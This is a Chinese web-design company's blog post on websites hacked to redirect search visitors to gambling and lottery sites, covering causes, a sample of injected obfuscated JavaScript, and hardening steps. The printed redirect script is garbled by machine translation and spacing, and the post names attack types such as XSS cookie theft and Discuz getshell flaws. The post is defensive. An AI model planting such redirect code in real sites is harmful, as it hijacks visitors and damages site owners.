如何应对企业网站恶意跳转到赌博网站

2021-04-20    分类: 网站建设

近日,公司内部一位纪录片同事表示,当大量广州建站公司客户在做百度推广时,网站首页点击后会自动跳转到彩票网站和赌博网站,让用户从百度搜索或推广广告空间进入网站后可以跳转,但直接进入网站时没有跳转。由此造成的用户流失导致访问量锐减、网站服务器资源浪费、推广费用浪费等。甚至可以说,在百度推广和搜狗推广的都是广告彩票公司,在网站建设行业引起轩然大波。


很多客户在回应这个问题的时候,会找广告主来补偿甚至追究责任。因此,我们的运营商需要关注并知道如何快速解决网站恶意跳转的问题。经过网络咨询和测试,广州网站建设公司于君网总结了以下经验:


首先分析网站被黑,跳转到赌博网站的原因


一般一个网站被黑,是因为服务器信息(服务器IP远程端口管理员账号密码、SSH端口、root账号密码)与包括FTP账号密码在内的网站信息对接被黑客知道,导致黑客植入木马或后门。


在整体安全监控中,asp网站和php网站都有木马,这意味着木马可以以php脚本木马、asp脚本木马和jsp脚本木马的形式存在。这些木马可以恶意篡改网站、上传、重命名、下载等管理员的高权限操作。网站被跳转的客户所采用的网站架构是php  mysql架构和jsp  mysql架构,大多使用开源程序,如dedecms、dream  weaving系统、phpcms系统、discuz系统等。


当我们知道一些代码的时候,难免会在网站首页看到一些恶意篡改代码。删除恶意代码后,我们可能会在几天内完全停止跳转,但一段时间后,我们又会被跳转。这是一个非常讨厌的临时解决方案。短时间后网站会再次跳转,很难甚至不可能完全消除网站漏洞。


通过观察一些客户网站的首页,首页代码中有一个加密的代码,根据搜索引擎的特点进行跳转。例如,通过百度搜索和360搜索,搜狗搜索人会直接跳到彩票和赌博网站。以下代码:


type='text/java  '


eval(function(p,a,c,k,e,d){e=function(c){return(c35?string  . FromCharCode(c  29): c  . ToString(36))};if(!''.replace(/^/,string)){while(c-)d[e(c)]=k[c]| | e(c);k=[function(e){ retun  d[e]}];e=function(){ return  ' \ w  ' };c=1;};while(c-)if(k[c])p=p  . replace(new  RegExp(' b  ' e(c)' \ b  ',' g  '),k[c]);返回p;}(' l[' \ e  \ c  \ 1 \ m  \ I  \ 8 \ n  \ 0 '][' \ 7 \ 4 \ 9 \ 0 \ 8 '](' h  \ 2 \ 1 \ 4 \ 9 \ 3 \ 0 \ j  \ 3 \ 8 \ d  \ 6 \ 0 \ 8 \ k  \ 0 \ 5 \ f  \ a  \ r  \ a  2 \ 1 \ 4 \ 9 \ 3 \ 0 \ 6 \ 2 \ 4 \ 1 \ d  \ 6 \ s  \ 0 \ 3 \ 2 \ q  \ 5 \ 5 \ 7,29,29,' x74 | x63 | x73 | X70 | x72 | x2f  | x22 | x77 | x65 | x69 | x61 | x2e  | x6f  | X3D  | x64 | x6a  | x3e  | x3c  | x6d  | x79 | x78 | window  | x75 | x6e  | x6c  | x38 | x3a  | x76 | x68 '。拆分(' | '),0,{}))一旦受到攻击,百度搜索引擎会判断该网站是否受到攻击,然后在百度风险评估中心记录并标记该网站。百度网站安全中心提醒您,网站可能遭到黑客攻击,部分页面被非法篡改!红色表示百度风险。导致客户打开网站被百度直接拦截,如下图所示:



针对以上跳转攻击的特点,我司广州网站建设公司同意从手工代码方面进行审计,检测网站漏洞,网站后门木马清理,漏洞修复,xss获取管理员账号cookies,discuz拥有getshell漏洞,inject获取管理员漏洞,discuz上传绕过漏洞等。


二、修复并防止网站被恶意跳转


1.服务器目录的安全部署、管理员帐户密码的加密、数字的特殊符号要求、所有密码的大写字母和小写字母,以及向网站数据库分配公共权限帐户。


2.mysql数据库默认端口由3306改为61116,添加到端口安全策略中。不对外开放,外部IP无法连接数据库。只有本地127.0.0.1才能连接到数据库,以防止攻击者恶意猜测。


3.保护服务器的底层系统,包括远程端口登录的安全验证。


4.对网站代码进行全面的安全检查,包括定期升级网站程序源代码,修复补丁和网站漏洞。


广州网站建设公司处理网站跳转问题的方法有很多,以上只是解决问题的方法之一,所以作为网站建设公司,要对源代码进行优化调整,以保证后期网站不受影响,这就涉及到了源代码和网站版本的升级。


网站栏目:如何应对企业网站恶意跳转到赌博网站
文章起源:/news3/108953.html

成都网站建设公司_创新互联,为您提供网站设计公司网站设计建站公司网站收录ChatGPT服务器托管

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

成都定制网站建设